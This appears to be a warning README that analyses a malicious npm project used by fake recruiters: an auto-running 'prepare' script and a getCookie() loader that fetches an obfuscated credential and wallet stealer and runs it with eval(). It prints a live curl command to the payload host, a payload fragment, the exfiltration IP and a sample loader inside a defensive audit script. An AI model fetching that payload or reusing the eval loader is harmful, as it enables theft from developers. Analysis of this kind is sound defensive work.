The purpose of this repo is to show how developers sometimes become hacking targets of people posing as recruiters who want to hire them.
WARNING: DO NOT EXECUTE OR INSTALL ANYTHING FROM THIS REPOSITORY
In package.json, the "prepare" script is a lifecycle script that npm and yarn run automatically when you execute certain commands (such as npm install, or when publishing a package).

```json
"prepare": "concurrently \"node server/server.js\" \"react-scripts build\"",
```

Here, the prepare script starts the backend server (node server/server.js) and builds the React frontend (react-scripts build) at the same time, using the concurrently tool.
The frontend contains a function called getCookie() that executes automatically and fetches a payload from a malicious external server: api.npoint.io/...
That server returns obfuscated JavaScript. Obfuscation techniques used:
- Variable name mangling
- String encoding (base85-like custom encoding)
- Control flow obfuscation
- Dynamic function generation
```sh
curl -L -s https://api.npoint.io/4072eb8fe5d3580d84bf
```

```json
{"cookie":"{function _0x55d4(_0x40abc4,_0x10e375){const _0x2e0885=_0x3c13();return _0x55d4=function(_0x3c137b,_0x55d45e){_0x3c137b=_0x3c137b-(0x1*0x11a5+-0x15c2+0x4df);let _0x16bb10=_0x2e0885[_0x3c137b];return _0x16bb10;},_0x55d4(_0x40abc4,_0x10e375);}(function(..."}
```

The getCookie() function immediately executes the retrieved payload with eval(res.data.cookie), so the malicious code runs without any user interaction.
Because this logic is wired into the "prepare" script in package.json, the attack chain starts automatically as soon as you run npm install in the project directory. The malicious activity therefore begins the moment a developer starts working with the project.
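The two indicators described above (an auto-running lifecycle script, and source code that fetches a remote payload and passes it to eval()) can be checked before ever running npm install. The following is an added example of such a pre-install audit; it is not code from this repository, and its sample inputs (including the placeholder URL payload.example) are constructed here to mirror the package.json and getCookie() pattern described on this page.

```javascript
// Added example, not code from the repository described above: a pre-install
// audit a developer can run on an unfamiliar project before `npm install`.
// It reports lifecycle scripts that npm/yarn run automatically, and source
// text that fetches from a remote URL and hands the response to eval().
// Sample inputs are constructed to mirror the package.json and getCookie()
// pattern on this page; the real payload host is deliberately not reproduced.

// Scripts npm/yarn execute without an explicit `npm run <name>`.
const AUTO_SCRIPTS = ['preinstall', 'install', 'postinstall',
  'preprepare', 'prepare', 'postprepare', 'prepublish'];

// Returns every auto-running lifecycle script with its command line.
function auditPackageJson(pkgText) {
  const scripts = JSON.parse(pkgText).scripts || {};
  return Object.keys(scripts)
    .filter((name) => AUTO_SCRIPTS.includes(name))
    .map((name) => ({ script: name, command: scripts[name] }));
}

// Returns indicators found in one JS source text: dynamic code execution,
// network fetches, and any absolute URLs those fetches could reach.
function auditSource(srcText) {
  const findings = [];
  if (/\beval\s*\(|new\s+Function\s*\(/.test(srcText)) findings.push('dynamic-eval');
  if (/\b(fetch|axios\.(get|post|request)|XMLHttpRequest)\b/.test(srcText)) findings.push('remote-fetch');
  const urls = srcText.match(/https?:\/\/[^\s'"`)]+/g) || [];
  return { findings, urls };
}

// Constructed samples: the page's prepare script and a getCookie()-style
// loader with a placeholder URL (hypothetical host, not the real one).
const SAMPLE_PKG = JSON.stringify({ scripts: {
  start: 'react-scripts start',
  prepare: 'concurrently "node server/server.js" "react-scripts build"' } });
const SAMPLE_SRC = "function getCookie(){axios.get('https://payload.example/x')" +
  ".then(res=>eval(res.data.cookie));}getCookie();";

// Audits the constructed samples. A 'prepare' hit plus a file that combines
// 'dynamic-eval' and 'remote-fetch' is exactly the chain this page describes.
function runDemo() {
  return { scripts: auditPackageJson(SAMPLE_PKG), source: auditSource(SAMPLE_SRC) };
}
```

On a real project, pass the contents of package.json and of each source file (read with fs.readFileSync) to auditPackageJson() and auditSource(); any flagged lifecycle script is a reason to install with npm's --ignore-scripts option and read the scripts first.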
Once deobfuscated, the payload does the following:
- It scans for browser profiles (Chrome, Opera, Brave).
- It extracts stored passwords and browser cookies.
- It identifies and enumerates crypto wallet extensions.
- It gathers detailed system information.
- It packages all collected data methodically in preparation for exfiltration.
Finally, all of the collected data is exfiltrated to the attacker's server at http://23.227.202.24, so the theft completes quickly and without any visible sign to the developer.